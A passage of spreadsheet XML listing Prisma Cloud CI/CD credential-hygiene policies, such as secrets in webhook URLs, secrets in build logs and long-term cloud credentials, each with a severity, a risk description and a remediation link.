          <t>Including secrets in a webhook URL comes with risks: • Apps and actors with access to the webhook URL will have access to the secret • Third party systems logging webhook URLs could gain access to the secrets included in the URL • When part of an unencrypted HTTP request, a webhook URL exposes the secret to anyone with access to the traffic such as cache servers and firewalls • Placing secrets in a webhook URL makes it more difficult to rotate them An attacker could use these secrets to gain unauthorized access to services that are used to authenticate the webhook against.</t>
        </is>
      </c>
      <c r="X140" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-secrets-webhook-url</t>
        </is>
      </c>
      <c r="Y140" t="inlineStr"/>
      <c r="Z140" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA140" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB140" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC140" t="inlineStr"/>
      <c r="AD140" t="b">
        <v>1</v>
      </c>
      <c r="AE140" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF140" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>afadf46d-2f1c-418d-b129-9bab6132955f</t>
        </is>
      </c>
      <c r="AI140" t="inlineStr"/>
      <c r="AJ140" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK140" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" t="inlineStr"/>
      <c r="B141" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C141" s="2" t="inlineStr"/>
      <c r="D141" t="inlineStr"/>
      <c r="E141" t="inlineStr"/>
      <c r="F141" t="inlineStr"/>
      <c r="G141" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J141" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K141" t="inlineStr">
        <is>
          <t>Github Actions accesses cloud provider using insecure long-term credentials</t>
        </is>
      </c>
      <c r="L141" t="inlineStr"/>
      <c r="M141" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N141" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O141" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P141" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q141" t="inlineStr"/>
      <c r="R141" t="inlineStr"/>
      <c r="S141" t="inlineStr"/>
      <c r="T141" t="b">
        <v>0</v>
      </c>
      <c r="U141" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V141" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W141" t="inlineStr">
        <is>
          <t>Long-term credentials intended to be used by GitHub Actions workflows to authenticate to a cloud provider account are stored on GitHub as a secret. This increases the impact of credential theft, since stolen credentials can be used long after a workflow run is complete. In the GitHub Free and Teams plans, it is not possible to limit the access to stored secrets from protected branches. A secret available to a repository can be exposed by any user who has permission to modify its code.</t>
        </is>
      </c>
      <c r="X141" t="inlineStr">
        <is>
          <t>Since October 2021, GitHub supports the OIDC (OpenID Connect) authentication protocol to replace long-term credentials with short-lived access tokens. Using OIDC, the GitHub Actions workflow can request a short-lived token directly from the cloud provider, which expires automatically as the workflow run ends. In addition, OIDC allows more granular control over how secrets can be used. For example, it is possible to filter access to tokens when the request originates in specific protected branches or environments.For more information about using OIDC in GitHub: https://docs.github.com/en/actions/deployment/security-hardening-your-deployments/about-security-hardening-with-openid-connect</t>
        </is>
      </c>
      <c r="Y141" t="inlineStr"/>
      <c r="Z141" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA141" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB141" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC141" t="inlineStr"/>
      <c r="AD141" t="b">
        <v>1</v>
      </c>
      <c r="AE141" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF141" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>4127c021-37d4-4469-b399-ca642d5b3bfe</t>
        </is>
      </c>
      <c r="AI141" t="inlineStr"/>
      <c r="AJ141" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK141" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" t="inlineStr"/>
      <c r="B142" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C142" s="2" t="inlineStr"/>
      <c r="D142" t="inlineStr"/>
      <c r="E142" t="inlineStr"/>
      <c r="F142" t="inlineStr"/>
      <c r="G142" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J142" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K142" t="inlineStr">
        <is>
          <t>Secrets found in console output of a Jenkins pipeline</t>
        </is>
      </c>
      <c r="L142" t="inlineStr"/>
      <c r="M142" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N142" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O142" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P142" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q142" t="inlineStr"/>
      <c r="R142" t="inlineStr"/>
      <c r="S142" t="inlineStr"/>
      <c r="T142" t="b">
        <v>0</v>
      </c>
      <c r="U142" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V142" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W142" t="inlineStr">
        <is>
          <t>Secrets exposed in build log files can be used by an attacker that has taken over an account with access to the system in order to move laterally in the organization. Exposed secrets can be caused by not using the relevant feature to protect credentials or by printing credentials in a way that bypasses the feature`s ability to detect credentials.</t>
        </is>
      </c>
      <c r="X142" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-secrets-console-output</t>
        </is>
      </c>
      <c r="Y142" t="inlineStr"/>
      <c r="Z142" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA142" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB142" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC142" t="inlineStr"/>
      <c r="AD142" t="b">
        <v>1</v>
      </c>
      <c r="AE142" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF142" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>8ee60411-a905-4cf1-8b12-8dac4883fd19</t>
        </is>
      </c>
      <c r="AI142" t="inlineStr"/>
      <c r="AJ142" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK142" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" t="inlineStr"/>
      <c r="B143" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C143" s="2" t="inlineStr"/>
      <c r="D143" t="inlineStr"/>
      <c r="E143" t="inlineStr"/>
      <c r="F143" t="inlineStr"/>
      <c r="G143" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J143" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K143" t="inlineStr">
        <is>
          <t>Secrets found in console output of a GitHub Actions pipeline</t>
        </is>
      </c>
      <c r="L143" t="inlineStr"/>
      <c r="M143" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N143" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O143" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P143" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q143" t="inlineStr"/>
      <c r="R143" t="inlineStr"/>
      <c r="S143" t="inlineStr"/>
      <c r="T143" t="b">
        <v>0</v>
      </c>
      <c r="U143" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V143" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W143" t="inlineStr">
        <is>
          <t>Secrets exposed in build log files can be used by an attacker that has taken over an account with access to the system in order to move laterally in the organization. Exposed secrets can be caused by not using the relevant feature to protect credentials or by printing credentials in a way that bypasses the feature`s ability to detect credentials.</t>
        </is>
      </c>
      <c r="X143" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/ghac-pipeline-secrets-console-output</t>
        </is>
      </c>
      <c r="Y143" t="inlineStr"/>
      <c r="Z143" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA143" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB143" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC143" t="inlineStr"/>
      <c r="AD143" t="b">
        <v>1</v>
      </c>
      <c r="AE143" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF143" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>ebda213e-8efd-4190-9e35-f53263555dec</t>
        </is>
      </c>
      <c r="AI143" t="inlineStr"/>
      <c r="AJ143" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK143" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" t="inlineStr"/>
      <c r="B144" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C144" s="2" t="inlineStr"/>
      <c r="D144" t="inlineStr"/>
      <c r="E144" t="inlineStr"/>
      <c r="F144" t="inlineStr"/>
      <c r="G144" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J144" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K144" t="inlineStr">
        <is>
          <t>GitLab CI environment variables exposed when printed to log</t>
        </is>
      </c>
      <c r="L144" t="inlineStr"/>
      <c r="M144" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N144" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O144" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P144" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q144" t="inlineStr"/>
      <c r="R144" t="inlineStr"/>
      <c r="S144" t="inlineStr"/>
      <c r="T144" t="b">
        <v>0</v>
      </c>
      <c r="U144" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V144" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W144" t="inlineStr">
        <is>
          <t>Environment variables are widely used in CI/CD systems as a common method of sharing secrets between processes. They may contain credentials, internal host addresses, and additional sensitive information. Once environment variables are printed to the pipeline job log, an attacker with access to the log can exfiltrate these secrets, reaching sensitive resources.</t>
        </is>
      </c>
      <c r="X144" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-ci-env-var-exposed-printlog</t>
        </is>
      </c>
      <c r="Y144" t="inlineStr"/>
      <c r="Z144" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA144" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB144" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC144" t="inlineStr"/>
      <c r="AD144" t="b">
        <v>1</v>
      </c>
      <c r="AE144" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF144" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>d80ed18c-ef70-4bab-a361-83657a45f26c</t>
        </is>
      </c>
      <c r="AI144" t="inlineStr"/>
      <c r="AJ144" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK144" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" t="inlineStr"/>
      <c r="B145" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C145" s="2" t="inlineStr"/>
      <c r="D145" t="inlineStr"/>
      <c r="E145" t="inlineStr"/>
      <c r="F145" t="inlineStr"/>
      <c r="G145" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J145" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K145" t="inlineStr">
        <is>
          <t>GitHub Actions environment variables exposed when printed to log</t>
        </is>
      </c>
      <c r="L145" t="inlineStr"/>
      <c r="M145" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N145" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O145" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P145" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q145" t="inlineStr"/>
      <c r="R145" t="inlineStr"/>
      <c r="S145" t="inlineStr"/>
      <c r="T145" t="b">
        <v>0</v>
      </c>
      <c r="U145" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V145" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W145" t="inlineStr">
        <is>
          <t>Environment variables are widely used in CI/CD systems as a common method of sharing secrets between processes. They may contain credentials, internal host addresses, and additional sensitive information. Once environment variables are printed to the pipeline job log, an attacker with access to the log can exfiltrate these secrets, reaching sensitive resources.</t>
        </is>
      </c>
      <c r="X145" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/ghactions-env-var-exposed-printlog</t>
        </is>
      </c>
      <c r="Y145" t="inlineStr"/>
      <c r="Z145" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA145" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB145" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC145" t="inlineStr"/>
      <c r="AD145" t="b">
        <v>1</v>
      </c>
      <c r="AE145" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF145" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>32fdfd84-e286-4991-9a9b-1ea6a27c7519</t>
        </is>
      </c>
      <c r="AI145" t="inlineStr"/>
      <c r="AJ145" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK145" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" t="inlineStr"/>
      <c r="B146" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C146" s="2" t="inlineStr"/>
      <c r="D146" t="inlineStr"/>
      <c r="E146" t="inlineStr"/>
      <c r="F146" t="inlineStr"/>
      <c r="G146" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J146" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K146" t="inlineStr">
        <is>
          <t>Secrets found in console output of a CircleCI pipeline</t>
        </is>
      </c>
      <c r="L146" t="inlineStr"/>
      <c r="M146" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N146" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O146" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P146" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q146" t="inlineStr"/>
      <c r="R146" t="inlineStr"/>
      <c r="S146" t="inlineStr"/>
      <c r="T146" t="b">
        <v>0</v>
      </c>
      <c r="U146" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V146" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W146" t="inlineStr">
        <is>
          <t>Secrets exposed in build log files can be used by an attacker that has taken over an account with access to the system in order to move laterally in the organization. Exposed secrets can be caused by not using the relevant feature to protect credentials or by printing credentials in a way that bypasses the feature`s ability to detect credentials.</t>
        </is>
      </c>
      <c r="X146" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/circleci-cicd-pipeline-policies/circleci-secrets-console-output</t>
        </is>
      </c>
      <c r="Y146" t="inlineStr"/>
      <c r="Z146" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA146" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB146" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC146" t="inlineStr"/>
      <c r="AD146" t="b">
        <v>1</v>
      </c>
      <c r="AE146" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF146" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>5d0b721f-1428-4eda-a8f2-4e8d71eaed1a</t>
        </is>
      </c>
      <c r="AI146" t="inlineStr"/>
      <c r="AJ146" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK146" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" t="inlineStr"/>
      <c r="B147" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C147" s="2" t="inlineStr"/>
      <c r="D147" t="inlineStr"/>
      <c r="E147" t="inlineStr"/>
      <c r="F147" t="inlineStr"/>
      <c r="G147" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J147" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K147" t="inlineStr">
        <is>
          <t>Secrets found in GitLab webhook URL</t>
        </is>
      </c>
      <c r="L147" t="inlineStr"/>
      <c r="M147" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N147" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O147" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P147" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q147" t="inlineStr"/>
      <c r="R147" t="inlineStr"/>
      <c r="S147" t="inlineStr"/>
      <c r="T147" t="b">
        <v>0</v>
      </c>
      <c r="U147" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V147" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W147" t="inlineStr">
        <is>
          <t>Including secrets in a webhook URL comes with risks: • Actors who can access webhooks through the API will be able to access secrets • Third party systems logging webhook URLs could gain access to the secrets included in the URL • When part of an unencrypted HTTP request, a webhook URL exposes the secret to anyone with access to the traffic such as cache servers and firewalls • Placing secrets in a webhook URL makes it more difficult to rotate them An attacker could use these secrets to gain unauthorized access to services that are used to authenticate the webhook against.</t>
        </is>
      </c>
      <c r="X147" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-secrets-webhook-url</t>
        </is>
      </c>
      <c r="Y147" t="inlineStr"/>
      <c r="Z147" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA147" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB147" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC147" t="inlineStr"/>
      <c r="AD147" t="b">
        <v>1</v>
      </c>
      <c r="AE147" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF147" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>64fa0a5d-95ed-44b1-9642-ebe6968bc601</t>
        </is>
      </c>
      <c r="AI147" t="inlineStr"/>
      <c r="AJ147" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK147" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" t="inlineStr"/>
      <c r="B148" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C148" s="2" t="inlineStr"/>
      <c r="D148" t="inlineStr"/>
      <c r="E148" t="inlineStr"/>
      <c r="F148" t="inlineStr"/>
      <c r="G148" t="b">
        <v>1</v>
      </c>
      <c r="H1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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J148" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K148" t="inlineStr">
        <is>
          <t>Secrets found in BitBucket webhook URL</t>
        </is>
      </c>
      <c r="L148" t="inlineStr"/>
      <c r="M148" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N148" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O148" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P148" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q148" t="inlineStr"/>
      <c r="R148" t="inlineStr"/>
      <c r="S148" t="inlineStr"/>
      <c r="T148" t="b">
        <v>0</v>
      </c>
      <c r="U148" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V148" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W148" t="inlineStr">
        <is>
          <t>Including secrets in a webhook URL comes with risks: • Third party systems logging webhook URLs could gain access to the secrets included in the URL • When part of an unencrypted HTTP request, a webhook URL exposes the secret to anyone with access to the traffic such as cache servers and firewalls • Placing secrets in a webhook URL makes it more difficult to rotate them An attacker could use these secrets to gain unauthorized access to services that are used to authenticate the webhook against.</t>
        </is>
      </c>
      <c r="X148" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-secrets-webhook-url</t>
        </is>
      </c>
      <c r="Y148" t="inlineStr"/>
      <c r="Z148" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA148" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB148" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC148" t="inlineStr"/>
      <c r="AD148" t="b">
        <v>1</v>
      </c>
      <c r="AE148" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF148" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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8" t="inlineStr">
        <is>
          <t>abcaa2aa-30f3-4631-9616-835c6e4bd7a4</t>
        </is>
      </c>
      <c r="AI148" t="inlineStr"/>
      <c r="AJ148" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK148" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" t="inlineStr"/>
      <c r="B149" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C149" s="2" t="inlineStr"/>
      <c r="D149" t="inlineStr"/>
      <c r="E149" t="inlineStr"/>
      <c r="F149" t="inlineStr"/>
      <c r="G149" t="b">
        <v>1</v>
      </c>
      <c r="H1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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J149" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K149" t="inlineStr">
        <is>
          <t>GitHub Actions pipeline uploads GITHUB_TOKEN in artifact</t>
        </is>
      </c>
      <c r="L149" t="inlineStr"/>
      <c r="M149" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N149" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O149" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P149" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q149" t="inlineStr"/>
      <c r="R149" t="inlineStr"/>
      <c r="S149" t="inlineStr"/>
      <c r="T149" t="b">
        <v>0</v>
      </c>
      <c r="U149" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V149" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W149" t="inlineStr">
        <is>
          <t>The pipeline uploads artifacts that may contain the GitHub Actions runner token (GITHUB_TOKEN). Attackers might be able to download artifacts storing the token, extract it and use it before the job ends.</t>
        </is>
      </c>
      <c r="X149" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gha-uploads-ghtoken-in-artifact</t>
        </is>
      </c>
      <c r="Y149" t="inlineStr"/>
      <c r="Z149" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA149" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB149" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC149" t="inlineStr"/>
      <c r="AD149" t="b">
        <v>1</v>
      </c>
      <c r="AE149" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF149" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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9" t="inlineStr">
        <is>
          <t>25287f9d-807c-4cac-927c-2033fe7d8fb6</t>
        </is>
      </c>
      <c r="AI149" t="inlineStr"/>
      <c r="AJ149" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK149" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" t="inlineStr"/>
      <c r="B150" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C150" s="2" t="inlineStr"/>
      <c r="D150" t="inlineStr"/>
      <c r="E150" t="inlineStr"/>
      <c r="F150" t="inlineStr"/>
      <c r="G150" t="b">
        <v>1</v>
      </c>
      <c r="H1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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J150" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K150" t="inlineStr">
        <is>
          <t>GitLab CI/CD accesses cloud provider using insecure long-term credentials</t>
        </is>
      </c>
      <c r="L150" t="inlineStr"/>
      <c r="M150" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
